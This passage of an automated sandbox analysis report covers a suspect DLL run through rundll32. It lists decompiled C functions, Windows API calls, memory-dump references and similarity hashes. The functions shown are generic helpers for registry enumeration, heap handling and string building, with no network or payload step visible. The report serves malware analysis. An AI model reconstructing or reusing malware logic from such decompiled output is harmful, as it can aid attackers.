			}

0x00795076
0x0079507d
0x007950c7
0x007950c9
0x007950c9
0x00795081
0x00795087
0x0079508c
0x00795090
0x00795096
0x0079509d
0x00000000
0x00000000
0x0079509f
0x007950a4
0x00000000
0x00000000
0x00000000
0x007950a4
0x007950a6
0x007950ae
0x007950b1
0x007950b1
0x007950b7
0x007950be
0x007950c1
0x007950c1
0x00000000

APIs

SetEvent.KERNEL32(000002F0,00000001,007956C9), ref: 00795081
SleepEx.KERNEL32(00000064,00000001), ref: 00795090
CloseHandle.KERNEL32(000002F0), ref: 007950B1
HeapDestroy.KERNEL32(04C20000), ref: 007950C1

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: dfa2550c676cc3e2483efd7274e4f6c7384dd71755db6cb50053cc470c59505c
Instruction ID: 515583bebbdf83645432bbb3dac4dc291aa5061d2eab4c5a2e412a1ee5b3544b
Opcode Fuzzy Hash: dfa2550c676cc3e2483efd7274e4f6c7384dd71755db6cb50053cc470c59505c
Instruction Fuzzy Hash: 78F03031B02722ABEF319B3DFC4CB5A37B8BB04B51B04815ABD14D7190DA2DD8018AE9

Uniqueness

Uniqueness Score: -1.00%

Function 007910DD, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E007910DD(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x79a37c; // 0x5019630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x79a37c; // 0x5019630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x79a030) {
					HeapFree( *0x79a290, 0, _t8);
				}
				_t14[1] = E0079578C(_v0, _t14);
				_t11 =  *0x79a37c; // 0x5019630
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x007910dd
0x007910dd
0x007910e6
0x007910f6
0x007910f6
0x007910fb
0x00791100
0x00000000
0x00000000
0x007910f0
0x007910f0
0x00791102
0x00791106
0x00791118
0x00791118
0x00791128
0x0079112b
0x00791130
0x00791134
0x0079113a

APIs

RtlEnterCriticalSection.NTDLL(050195F0), ref: 007910E6
Sleep.KERNEL32(0000000A,?,?,007955D3,?,?,?,?,?,00796BD8,?,00000001), ref: 007910F0
HeapFree.KERNEL32(00000000,00000000,?,?,007955D3,?,?,?,?,?,00796BD8,?,00000001), ref: 00791118
RtlLeaveCriticalSection.NTDLL(050195F0), ref: 00791134

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: c573f8c17563b555eaa8f7fa8ed79e4baf5e28c80d4c04057c504b2dd2fc345e
Instruction ID: 5ba7cee8e01aeaeb4d4344f3931432c413c0d28e9459ea0f0ed2e688af30691c
Opcode Fuzzy Hash: c573f8c17563b555eaa8f7fa8ed79e4baf5e28c80d4c04057c504b2dd2fc345e
Instruction Fuzzy Hash: 22F0FE70202246EBEB21DF7DEE49F1A77A4AB05740B04C416F655C7361C62DD851CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 007950DF, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E007950DF() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x79a37c; // 0x5019630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x79a37c; // 0x5019630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x79a37c; // 0x5019630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x79b83e) {
					HeapFree( *0x79a290, 0, _t10);
					_t7 =  *0x79a37c; // 0x5019630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x007950df
0x007950e8
0x007950f8
0x007950f8
0x007950fd
0x00795102
0x00000000
0x00000000
0x007950f2
0x007950f2
0x00795104
0x00795109
0x0079510d
0x00795120
0x00795126
0x00795126
0x0079512f
0x00795131
0x00795135
0x0079513b

APIs

RtlEnterCriticalSection.NTDLL(050195F0), ref: 007950E8
Sleep.KERNEL32(0000000A,?,?,007955D3,?,?,?,?,?,00796BD8,?,00000001), ref: 007950F2
HeapFree.KERNEL32(00000000,?,?,?,007955D3,?,?,?,?,?,00796BD8,?,00000001), ref: 00795120
RtlLeaveCriticalSection.NTDLL(050195F0), ref: 00795135

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 05a3b5d581f9df858eed89a5f0a8faa2077eb907da202f7cd6e1c56aba0c1e82
Instruction ID: 50f1218b38f4abfcb28f1c84a7d1d2bde9c605a0c5c23f951d96ab37e88f3e35
Opcode Fuzzy Hash: 05a3b5d581f9df858eed89a5f0a8faa2077eb907da202f7cd6e1c56aba0c1e82
Instruction Fuzzy Hash: 0AF0DA74241611EBEB159B3CED9AF1577A4AB49701B04C01AE91287360C73DAC42CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00794039, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98
registrysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00794039(void* __ecx, intOrPtr _a4) {
				char _v8;
				char _v12;
				long _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _t35;
				intOrPtr _t47;
				void* _t51;
				void* _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t53 =  *0x79a0f8(0x80000003, 0, 0, 0x20019,  &_v32);
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E00796837(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32);
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t53 =  *0x79a0f4(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0);
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E007950CA(_v28);
							goto L17;
						}
						_t53 = E00791D57(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4);
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E007950CA(_v24);
						_v20 = _v16;
						_t47 = E00796837(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x79a2c4, 0) == 0x102);
				goto L16;
			}

0x00794039
0x00794053
0x00794056
0x00794059
0x0079405c
0x00794065
0x00794069
0x00794143
0x00794147
0x00794147
0x00794072
0x00794079
0x00794080
0x00794083
0x00794138
0x0079413b
0x00000000
0x00794141
0x00794089
0x0079408c
0x00794093
0x0079409d
0x007940ac
0x007940b4
0x007940ec
0x00794126
0x0079412c
0x0079412e
0x0079412e
0x00794130
0x00794133
0x00000000
0x00794133
0x00794106
0x0079410a
0x00000000
0x00000000
0x00000000
0x0079410a
0x007940b9
0x007940c8
0x00000000
0x00000000
0x007940cd
0x007940d6
0x007940d9
0x007940e0
0x007940e3
0x007940be
0x007940be
0x00000000
0x007940be
0x007940e7
0x00000000
0x007940e7
0x007940bb
0x00000000
0x0079410c
0x00794119
0x00000000

APIs

Part of subcall function 00796837: RtlAllocateHeap.NTDLL(00000000,00000000,00794197), ref: 00796843

WaitForSingleObject.KERNEL32(00000000,?,?,?,007930C2,?,007930C2,?,?,?,?,?,007930C2,?), ref: 00794113
RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,007930C2,?,?,?,?,?,0079211B,?), ref: 0079413B

Strings

}y, xrefs: 007940A6

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: AllocateCloseHeapObjectSingleWait
String ID: }y
API String ID: 1423275866-1154581602
Opcode ID: cc4d646db3c64ae4cf489b8e186a3144999087f869ffd4f829943a18ef87ca9a
Instruction ID: 4b3a2fdc7c8cb5183311caf23917c7b237a9c6e0d2c899dd53d98e22843e05cf
Opcode Fuzzy Hash: cc4d646db3c64ae4cf489b8e186a3144999087f869ffd4f829943a18ef87ca9a
Instruction Fuzzy Hash: 83314971C4011AEACF21AFA9EC49DEEFFB9EB94340F104066E611B2160D2780E82DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D48D0C0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,6D55F148,00000646), ref: 6D48D13C

Strings

C:\Users\user\Desktop, xrefs: 6D48D173
coas, xrefs: 6D48D17F

Memory Dump Source

Source File: 00000003.00000002.925622775.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d47e000_rundll32.jbxd

Similarity

API ID: FileModuleName
String ID: C:\Users\user\Desktop$coas
API String ID: 514040917-3372674038
Opcode ID: cc766488978be84913890e7950abf24cb980ffa6d07024566bfda04e4769536a
Instruction ID: 008bc5dc014290b39c0ecc9be1e0274ced4dbb6fbe6e657992d95b092e574c69
Opcode Fuzzy Hash: cc766488978be84913890e7950abf24cb980ffa6d07024566bfda04e4769536a
Instruction Fuzzy Hash: E43170B1A141109FDF18EF29D954B7A37F5AB8A254B06412FE84AD7381EB74DC008BD5

Uniqueness

Uniqueness Score: -1.00%

Function 6D47EAFC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

RtlDecodePointer.NTDLL ref: 6D47EB04
RtlEncodePointer.NTDLL(6D4C9284), ref: 6D47EBA7

Strings

8}Lm, xrefs: 6D47EBF0

Memory Dump Source

Source File: 00000003.00000002.925622775.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d47e000_rundll32.jbxd

Similarity

API ID: Pointer$DecodeEncode
String ID: 8}Lm
API String ID: 3571222163-658368957
Opcode ID: 71899bcfac807ea694b42e509fcd4df4e2fd7b2f06a0c5540c3c6c2d4f41baf1
Instruction ID: e865b673c5f60f7518d8a246abd3f0348f3bfaf7562df7aa9f92e473422b9ad7
Opcode Fuzzy Hash: 71899bcfac807ea694b42e509fcd4df4e2fd7b2f06a0c5540c3c6c2d4f41baf1
Instruction Fuzzy Hash: 48216736D09212ABDF21AF25D880FD63B74EB07329722057AE955A7250C736DC40CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 00792F68, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00792F68(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				intOrPtr _t56;
				void* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 = _t56 + _t5;
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 =  *0x79a11c(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t48 = RtlAllocateHeap( *0x79a290, 0, _a16 + __eax);
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E007977A4(_t57 - _a4, _a4, _t48);
							_t38 = E007977A4(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E007977A4(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}

0x00792f70
0x00792f75
0x00792f77
0x00792f7e
0x00792f90
0x00792f90
0x00792f94
0x00792f96
0x00792f99
0x00792f9c
0x00792fa5
0x00792faf
0x00792fb3
0x00792fb8
0x00792fce
0x00792fd2
0x00793021
0x00792fd4
0x00792fd4
0x00792fdd
0x00792fec
0x00792ff1
0x00792ffe
0x00793007
0x00793012
0x00793019
0x0079301d
0x0079301d
0x00792fd2
0x00793028
0x0079302f

APIs

lstrlen.KERNEL32(73BCF710,?,00000000,?,73BCF710), ref: 00792F9C
RtlAllocateHeap.NTDLL(00000000,?), ref: 00792FC8

Strings

xy, xrefs: 00792FA9

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: AllocateHeaplstrlen
String ID: xy
API String ID: 556738718-705605370
Opcode ID: fefdbcd733a4afde7301cfcc1c25d272b18cf4bc99f83c932320bc79f8ea848a
Instruction ID: 45c5092cb413a256507df58984f973b86f4f549d21dc926dae6e490968499f79
Opcode Fuzzy Hash: fefdbcd733a4afde7301cfcc1c25d272b18cf4bc99f83c932320bc79f8ea848a
Instruction Fuzzy Hash: 4B213E35604149AFDF11DF6CD884B9EBFB6EF85310F048155E804AB315C739DA15CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D482032, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcsnlen.LIBCMT ref: 6D482045

Strings

U, xrefs: 6D48204E

Memory Dump Source

Source File: 00000003.00000002.925622775.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d47e000_rundll32.jbxd

Similarity

API ID: _wcsnlen
String ID: U
API String ID: 3628947076-3372436214
Opcode ID: fd6dcf58d7f2f99a98a49370346960786ec512422ba1d96773458ec2cf98698f
Instruction ID: 0ae365d3c17f3a08a2a89f4f73c16958f8bd0e522b74be54a10fc8c730e9e5ed
Opcode Fuzzy Hash: fd6dcf58d7f2f99a98a49370346960786ec512422ba1d96773458ec2cf98698f
Instruction Fuzzy Hash: 84F0BB3221C6496EEB1195B49CC4F77339DD7827D4F604429FB08C5152FF21CD41C290

Uniqueness

Uniqueness Score: -1.00%

Function 00791A15, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
registryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00791A15(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _t11;
				void* _t15;

				_t11 =  *0x79a0bc(_a4, _a12,  &_a12);
				_t15 = _t11;
				if(_t15 == 0) {
					_t15 =  *0x79a0c4(_a12, _a16, _t11, _a8, _a20, _a24);
					RegCloseKey(_a12);
				}
				return _t15;
			}

0x00791a23
0x00791a29
0x00791a2d
0x00791a48
0x00791a4a
0x00791a4a
0x00791a54

APIs

RegCloseKey.ADVAPI32(00791E05,?,00795F64,80000002,00000003,00791E05,?,?,?,?,00797792,3D007990,00000000,80000002,00000000,000000F2), ref: 00791A4A

Strings

.yy, xrefs: 00791A23
Syy, xrefs: 00791A3F

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: Close
String ID: .yy$Syy
API String ID: 3535843008-1284497583
Opcode ID: ac1f4e9992e95d17f4759453fde2b8812ded2bea394406557e60cd3291435e96
Instruction ID: e39603cf8528052a688faae115072eca72dd24e8129a2ffa75373c2d397cca95
Opcode Fuzzy Hash: ac1f4e9992e95d17f4759453fde2b8812ded2bea394406557e60cd3291435e96
Instruction Fuzzy Hash: F6E0527650125ABBCF125F94ED089AA7B7AFB08391B048422FE1192220D736D931EBE5

Uniqueness

Uniqueness Score: -1.00%

Function 007978EB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007978EB() {

				E00797A76(0x7992c4, 0x79a11c);
				goto __eax;
			}

0x007978ba
0x007978c1

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007978BA

Part of subcall function 00797A76: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00797AEF

Strings

xy, xrefs: 007978EB
xy, xrefs: 007978B4

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID: xy$xy
API String ID: 123106877-1875382505
Opcode ID: ee63335e110eecc22ee556ef4275ed897d4afec3c96b827e2df829f8abc4712e
Instruction ID: 1b30e3440b533f04aa7f912593b0542d44345f162f8d05a7275bedc50f17a4f5
Opcode Fuzzy Hash: ee63335e110eecc22ee556ef4275ed897d4afec3c96b827e2df829f8abc4712e
Instruction Fuzzy Hash: FEB092816AD001BC3A18A208380AD3A0218C085B10720C02AB400C4280A44808448032

Uniqueness

Uniqueness Score: -1.00%

Function 00797967, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00797967() {

				E00797A76(0x799304, 0x79a0cc);
				goto __eax;
			}

0x00797940
0x00797947

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00797940

Part of subcall function 00797A76: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00797AEF

Strings

gyy, xrefs: 00797967
Syy, xrefs: 0079793A

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID: Syy$gyy
API String ID: 123106877-3797031944
Opcode ID: 8f7f72566f20936f32f53ee2d15f5266abf1706393827a909e4e64d1364d48a2
Instruction ID: 31450cad7ae8513d7410b6b18b20affc9e7ef720b811c58cf91a397e070a72ea
Opcode Fuzzy Hash: 8f7f72566f20936f32f53ee2d15f5266abf1706393827a909e4e64d1364d48a2
Instruction Fuzzy Hash: F5B0929126D002EC3A48910C780AD3A0128C184B20320C02AB500C9280E44819004072

Uniqueness

Uniqueness Score: -1.00%

Function 0079792E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0079792E() {

				E00797A76(0x799304, 0x79a0bc);
				goto __eax;
			}

0x00797940
0x00797947

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00797940

Part of subcall function 00797A76: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00797AEF

Strings

.yy, xrefs: 0079792E
Syy, xrefs: 0079793A

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID: .yy$Syy
API String ID: 123106877-1284497583
Opcode ID: d0d1dc28300722343e446c2f4f991291bc4de1a0129290078735cec9d6caa5fd
Instruction ID: 612ca1c30e9240a85d3ac22b6d2cc59dc44688e8d1f74b7a3c299640122e75bc
Opcode Fuzzy Hash: d0d1dc28300722343e446c2f4f991291bc4de1a0129290078735cec9d6caa5fd
Instruction Fuzzy Hash: 27B002D56BE101FD7E5C555D7E0AD3A011CC5D4F21730C52EF511D8191F48C5D455077

Uniqueness

Uniqueness Score: -1.00%

Function 00793D98, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00793D98(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00796837(_t2);
				if(_t34 != 0) {
					_t30 = E00796837(_t28);
					if(_t30 == 0) {
						E007950CA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E007977DD(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E007977DD(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x00793d98
0x00793da2
0x00793da4
0x00793daa
0x00793daa
0x00793db3
0x00793db7
0x00793dc3
0x00793dc7
0x00793e3b
0x00793dc9
0x00793dc9
0x00793dcd
0x00793dd4
0x00793dd7
0x00793df1
0x00793de0
0x00793de0
0x00793de4
0x00793de7
0x00793dec
0x00793dec
0x00793df6
0x00793e1e
0x00793e24
0x00793e27
0x00793df8
0x00793dfa
0x00793e02
0x00793e0d
0x00793e12
0x00793e12
0x00793e2e
0x00793e35
0x00793e36
0x00793e36
0x00793dc7
0x00793e46

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00793CEE,00000000,00000000,00000000,05019698,?,?,0079106E,?,05019698), ref: 00793DA4

Part of subcall function 00796837: RtlAllocateHeap.NTDLL(00000000,00000000,00794197), ref: 00796843

Part of subcall function 007977DD: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00793DD2,00000000,00000001,00000001,?,?,00793CEE,00000000,00000000,00000000,05019698), ref: 007977EB
Part of subcall function 007977DD: StrChrA.SHLWAPI(?,0000003F,?,?,00793CEE,00000000,00000000,00000000,05019698,?,?,0079106E,?,05019698,0000EA60,?), ref: 007977F5

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00793CEE,00000000,00000000,00000000,05019698,?,?,0079106E), ref: 00793E02
lstrcpy.KERNEL32(00000000,00000000), ref: 00793E12
lstrcpy.KERNEL32(00000000,00000000), ref: 00793E1E

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: a71b664837c917791e9eafd8f07592139bec5c63a37ab64df9b8f7b02cbcc5d8
Instruction ID: d8062785818d1a2a421723d415a0752c3cbe9d1a0d473af449c7e9b978c8197d
Opcode Fuzzy Hash: a71b664837c917791e9eafd8f07592139bec5c63a37ab64df9b8f7b02cbcc5d8
Instruction Fuzzy Hash: 2421A272504255EBDF129FB8EC99EAB7FB8EF06344B048055F9049B211D739DE01C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00795D37, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00795D37(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00796837(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x00795d4c
0x00795d50
0x00795d5a
0x00795d61
0x00795d64
0x00795d66
0x00795d6e
0x00795d73
0x00795d81
0x00795d86
0x00795d90

APIs

lstrlenW.KERNEL32(004F0053,?,73B75520,00000008,050192FC,?,00791B37,004F0053,050192FC,?,?,?,?,?,?,007920B0), ref: 00795D47
lstrlenW.KERNEL32(00791B37,?,00791B37,004F0053,050192FC,?,?,?,?,?,?,007920B0), ref: 00795D4E

Part of subcall function 00796837: RtlAllocateHeap.NTDLL(00000000,00000000,00794197), ref: 00796843

memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,00791B37,004F0053,050192FC,?,?,?,?,?,?,007920B0), ref: 00795D6E
memcpy.NTDLL(73B769A0,00791B37,00000002,00000000,004F0053,73B769A0,?,?,00791B37,004F0053,050192FC), ref: 00795D81

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
